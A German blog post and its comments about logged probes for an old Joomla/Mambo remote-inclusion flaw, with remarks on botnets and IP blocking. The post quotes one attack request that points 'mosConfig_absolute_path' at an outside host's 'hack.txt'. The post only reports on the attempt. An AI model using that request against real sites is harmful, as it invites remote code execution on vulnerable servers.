Joomla CMS Hack

Ich nutze hier im Blog definitiv WordPress, aber zahlreiche Anfragen werden auf nicht-existente URLs gemacht, die wohl irgendwie eine Hintertür beim Joomla CMS öffnen sollen. Hier ein Beispiel:

/////////////?mosConfig_absolute_path=http://sonstwo.server.com/hack.txt

Scheinbar ist die mosConfig_absolute_path im Joomla CMS oder in veralteten Versionen absolut anfällig für zwischenmenschliche Schandtaten… naja, das wollte ich auch nur mal so mitteilen.

Veröffentlicht von

Mike Schnoor ist Senior Partner von Guts & Glory, der Manufaktur für die Digitalisierung von Marken, Unternehmen und Institutionen. Als Berater sorgt er dafür, dass Unternehmen sich im digitalen Wettbewerb hinsichtlich Kommunikation, Prozesse, Kreation und Social Media richtig positionieren können. Seine beruflichen Schwerpunkte liegen in der Digitalen Transformation, Kommunikation, Digital Strategy, Marketing, Public Relations und Social Media. Auf seinem persönlichen Blog mikeschnoor.com und im Magazin #DigiBuzz veröffentlicht er verschiedene Fachartikel zu seinem Themenportfolio. Folge @MikeSchnoor bei Twitter!

6 Kommentare » Schreibe einen Kommentar

  1. Kann ich nur Bestätigen (die Einbruchsversuche)… allerdings scheinen die Täter nicht viel Know-How zu besitzen…

  2. Ich möchte ja fast diese dilletantistischen Momente so richtig an den Pranger stellen und die IPs preisgeben, aber näää… :P

  3. Ich veröffentliche manchmal Anweisungen für die .htaccess-Datei… das befriedigt auch ;-)

  4. Mir graut es jedesmal wenn ich in meine Logfiles schaue. Was da an „Angriffen“ reinkommt ist nicht mehr lustig und es wird subjektiv immer mehr.

    @Moellus:

    Ist das gemeint: „Eine Schwachstelle in TikiWiki 1.9.8 kann von einem Angreifer dazu ausgenutzt werden, beliebigen Programmcode auf dem beherbergenden Rechnersystem auszuführen. Es ist bereits funktionierender Exploit Code in Umlauf und die Schwachstelle wird bereits aktiv ausgenutzt. Es ist noch kein Patch verfügbar, …“?

  5. Och – das ist ne alte Lücke… müsste aber schon lange gestopft sein… (wobei denkbar währe, dass es eigentlich eher ne Mambo Lücke war – kann ich aber nicht genau sagen) so ungefähr seit Joomla eine Register Globals = „Off“ Emulation hat ;-)

    „allerdings scheinen die Täter nicht viel Know-How zu besitzen…“
    Glaubst du? Es ist weniger Aufwand den „Hack“versuch direkt zu begehen, als erst die Startseite zu laden und zu versuchen herauszufinden, ob denn das Zielsystem installiert ist.

    Was IPs angeht… Botnetze und Zobierechner sowie wechselnde IPs machen einem das Leben manchmal zur Hölle, wenn man IPs blocken möchte ;-)

Schreibe einen Kommentar

Pflichtfelder sind mit * markiert.